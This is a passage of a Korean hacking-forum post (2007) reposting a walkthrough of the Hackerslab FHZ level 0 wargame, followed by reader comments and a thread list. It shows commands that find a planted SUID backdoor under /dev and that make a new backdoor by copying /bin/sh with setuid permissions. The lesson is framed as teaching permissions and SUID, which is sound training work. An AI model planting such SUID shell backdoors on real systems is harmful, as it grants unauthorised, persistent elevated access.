1581,

3/80

HackerMapia

* 홈페이지 해킹 * 좋은자료 *

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=640 [복사]

누군가 우리 시스템에 침입하여 백도어를 설치하여 두었다.

당신의 임무는 그 백도어를 악용하여 다음 레벨로 진입하는 것이다.

Hint - 디바이스도 아닌 것이 디바이스 드라이버 무리속에...

-----------------------------------------------------

우선 문제를 해석해봅시다..

백도어란.. 일반사용자가 루뜨권한을 획득하고 추후에 다시 들어왔을때

루뜨권한을 손쉽게 얻기위해 만들어 놓는 것입니다

즉 여기서는 처음 접속하면 level0 이니깐 누군가 level1 권한을 획득한후

level0 이 손쉽게 level1의 권한을 획득할수있도록 백도어를 설치해놓았다는

것이 되겠죠..

힌트가 디바이스가 아닌 것이 디바이스 무리속에..네요

윈도우 보면 c:\안에 windows , my docu~ , programfile 등 여러가지폴더를

보실수 있으실 것입니다 그런데..

윈도우98에서는 디스켓넣는부분을 a:\로 씨디롬은 d:\로 구별하는반면

리눅스는 드라이브역시 파일로 인식합니다.

즈 마우스나 씨디롬 하드등을요.. 하드웨어는 리눅스에서는 /dev라는

디렉토리에 집합을 합니다. 리눅스의 디렉토리 구조에 대해서 한번 찾아보세요

여기서 백도어는 SetUID 즉 Suid로 실행 순간 운영자의 권한을 얻는것을 말합니다

핵랩에서는 자기보다 높은 권한이 되겠죠?

즉 문제를 해석해보면 /dev 디렉토리에 suid로된 백도어가 되었다는 말이되겠죠?

자 문제를 풀어볼까요?

텔넷연결 drill.hackerslab.org

login : level0

passwd : guest [한 3초쉬고 엔터]

[level0@drill level0]$ cd tmp [내 디렉토리에서 tmp 디렉토리로 들어가자]

[level0@drill tmp]$ find / -user level1 -group level0 -perm -4000 >list

여기서 위명령어는 / 전디렉토리에서 소유자가 level1 이고 그룹이 level0인

suid가 걸린 파일을 찾아서 list 라는 곳에 저장하여라는 말이예요

[level0@drill tmp]$ cat list [list를 확인해 볼까요?]

/dev/.hi

[level0@drill tmp]$ ls -al /dev/.hi [발견한 파일의 정보를 봅시다]

-rwsr-x--- 1 level1 level0 12900 Jan 28 2000 /dev/.hi

[level0@drill tmp]$

[level0@drill tmp]$ whoami [나는 누구인가?]

level0

[level0@drill tmp]$ /dev/.hi [백도어를 실행시켜 볼까요..]

[level0@drill tmp]$ whoami

level1

[level0@drill tmp]$ pass [이걸 치면 레벨1로가는 답이 나오겠죠?]

자 이번에는 우리가 직접 백도어를 만들어 봅시다

[level0@drill tmp]$ whoami ; pwd [내가 누구인가? 그리고 지금 어디에있지?]

level1

/home/level0/tmp

[level0@drill tmp]$ cp /bin/sh /home/level0/tmp/cs [cp A B => A를 B로 복사하라]

[level0@drill tmp]$ chmod 4755 cs [4755는 퍼미션을 준것으로 퍼미션참조바람]

[level0@drill tmp]$ ls -al cs [앗! rws.. suid..레벨0이 이걸 실행하면 레벨1이되겠군]

-rwsr-xr-x 1 level1 level0 373304 Aug 8 16:44 cs*

[level0@drill tmp]$ exit

exit

[level0@drill tmp]$ whoami

level0

[level0@drill tmp]$ ./cs [실행시켜볼까?]

[level0@drill tmp]$ whoami

level1

[level0@drill tmp]$

이게 끝입니다. 너무 시시하죠?

저 위에 명령어들에 대해 갈쳐달라고만 하지마시고

직접 찾아보시는 모습을 기대하겠습니다

그리고 ★퍼미션,suid,find 이해가 주된목적인 강좌입니다

해커스쿨에서 리눅스를 배우는 우리들에게
좋은자료가 될거라고본다.

출저 cafe daum /nukings

Hit : 10894 Date : 2007/02/22 08:07


HackerMapia	이러다가 해커스쿨 해킹당하는거 아니야 ? ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ	2007/02/22
asdf	제목과는 다른 내용이네요. 해커스랩 fhz 1번 문제 풀이인데 ..	2007/02/22
HackerMapia	저는 똑같이 퍼온거뿐입니다	2007/02/22
HackerMapia	흠 난왜 저기에 텔넷접속이 안되지 ;	2007/02/22
whqkdnf000	해커스랩 텔넷 막혔던데;	2007/02/24
kyw1111	제가 어떤카페에들어갓는데 해커스쿨 이라는곳을뚫어보앗다라는글을봣음 거기에 해커스쿨사람들아이디하고비번잇던디...	2007/04/09
exceed@null	ㅋㅋㅋ 좋은 글입니다.	2007/07/16

1541

* 해킹영화 볼만한거 *[5]

HackerMapia

02/20

11858

1540

* 해커의 분류 *[6]

HackerMapia

02/22

7810

1539

* 해커가 되고싶나 ? *[19]

HackerMapia

03/01

12780

1538

* 해커가 알아야할 30가지 *[2]

HackerMapia

02/22

9672

1537

* 해커를 위한 레지스트리 해부 강좌 *[2]

HackerMapia

02/24

10850

* 홈페이지 해킹 * 좋은자료 *[7]

HackerMapia

02/22

10893

1535

* for문 사용법[2]

limjongmin

08/20

7027

1534

* printf 사용법

limjongmin

08/20

6646

1533

* window Vista 에 대해... *[3]

HackerMapia

02/22

7906

1532

* 평민들에게 권하는 테크닉 *[14]

HackerMapia

02/20

8565

1531

* 컴퓨터 종료 아이콘만들기 *[9]

HackerMapia

02/24

9655

1530

* 컴퓨터가 다운되는 8가지 이유 *[2]

HackerMapia

02/24

7551

1529

* 내컴퓨터 누가 만졋나;; *[13]

HackerMapia

02/24

9641

1528

* 도스 내부명령어 1 시작 - 실행 - cmd *[1]

HackerMapia

02/20

9120

1527

* 도스 외부명령어 1 *[1]

HackerMapia

02/20

7811

1526

* 도스명령어 최강자 되기 *[1]

HackerMapia

02/20

8746

1525

* 동영상 끊김없이 감상하기 *

HackerMapia

03/02

8716

1524

* 보안에 대한 주요 FAQ[8]

dl4815

01/14

11001

1523

* 엘리트해커가 되는길 *추천 *[30]

HackerMapia

03/02

14686

1522

- 재밌는글 설린인터넷고[1]

twinz

08/27

8006

[1][2] 3 [4][5][6][7][8][9][10]..[80]